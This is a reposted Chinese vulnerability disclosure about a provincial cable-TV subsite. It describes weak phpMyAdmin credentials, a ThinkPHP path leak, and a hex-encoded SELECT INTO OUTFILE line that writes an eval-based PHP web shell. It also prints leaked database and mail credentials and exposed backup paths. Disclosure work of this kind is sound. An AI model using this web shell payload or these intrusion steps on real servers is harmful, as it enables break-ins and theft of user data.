神刀安全网

漏洞标题: 某省广电网络某站点弱口令导致getshell(影响近万用户信息)

漏洞详情

披露状态:

2016-04-21: 细节已通知厂商并且等待厂商处理中
2016-04-25: 厂商已经确认,细节仅向厂商公开
2016-05-05: 细节向核心白帽子及相关领域专家公开
2016-05-15: 细节向普通白帽子公开
2016-05-25: 细节向实习白帽子公开
2016-06-09: 细节向公众公开

简要描述:

拿信息安全当儿戏

详细说明:

code 区域
http://**.**.**.**/

湖北广电网络下面的一个子站,使用的是修改版的thinkphp,有phpmyadmin,弱口令root/123456

漏洞标题:  某省广电网络某站点弱口令导致getshell(影响近万用户信息)

影响近万人的信息,包括手机号,家庭住址,智能卡号等等

漏洞标题:  某省广电网络某站点弱口令导致getshell(影响近万用户信息)

漏洞标题:  某省广电网络某站点弱口令导致getshell(影响近万用户信息)

1.7万的订单

漏洞标题:  某省广电网络某站点弱口令导致getshell(影响近万用户信息)

可以修改关注者的积分

漏洞标题:  某省广电网络某站点弱口令导致getshell(影响近万用户信息)

漏洞证明:

有phpmyadmin,想着怎么能拿下系统权限呢,没有路径,后来找到了登陆界面

code 区域
http://**.**.**.**/gdyxv2/index.php?s=/home/user/login.html

thinkphp最容易爆路径了,直接去掉后面的加上单引号

code 区域
http://**.**.**.**/gdyxv2/index.php?s='

漏洞标题:  某省广电网络某站点弱口令导致getshell(影响近万用户信息)

code 区域
/home/wwwroot/default/gdyxv2/

写入shell

code 区域
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E into outfile '/home/wwwroot/default/gdyxv2/aa.php'     cmd

得到了shell

漏洞标题:  某省广电网络某站点弱口令导致getshell(影响近万用户信息)

code 区域
$_config['db']['host']    = '**.**.**.**';  
$_config['db']['user'] = 'gdyx';
$_config['db']['pass'] = '123456';
$_config['db']['char'] = 'utf8';
$_config['db']['pconnect'] = 0;
$_config['db']['name'] = 'gdyxt';
$_config['db']['prev'] = 'gd_';

$_config['web']['title'] = '武汉广电有线';
$_config['web']['seotitle'] = '武汉广电有线';
$_config['web']['keywords'] = '';
$_config['web']['description'] = '武汉广电有线';

$_config['mail']['server'] = '**.**.**.**';
$_config['mail']['port'] = 25;
$_config['mail']['user'] = 'dwzhanglong@**.**.**.**';
$_config['mail']['password'] = '123456';
$_config['mail']['delimiter'] = 1;
$_config['mail']['mailusername']= 'KF265';
$_config['mail']['adminemail'] = 'dwzhanglong@**.**.**.**';

微信公众号信息,留一线,不贴出来了

漏洞标题:  某省广电网络某站点弱口令导致getshell(影响近万用户信息)

最后的最后,在附上两个

code 区域
http://**.**.**.**/ibh/.svn/entries
http://www.**.**.**.**/ibh.zip

修复方案:

修改口令

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 某省广电网络某站点弱口令导致getshell(影响近万用户信息)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址